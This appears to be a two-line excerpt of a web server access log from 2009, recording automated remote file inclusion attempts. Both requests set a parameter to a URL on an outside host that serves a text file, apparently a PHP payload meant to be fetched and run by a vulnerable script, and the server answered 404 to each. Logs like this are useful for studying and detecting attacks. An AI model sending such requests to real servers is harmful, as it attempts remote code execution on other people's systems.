74.213.177.58 - - [11/Nov/2009:21:22:54 -0600] "GET /errors.php?error=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
70.38.112.174 - - [11/Nov/2009:21:23:02 -0600] "GET /logs/access_log.1242691200//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
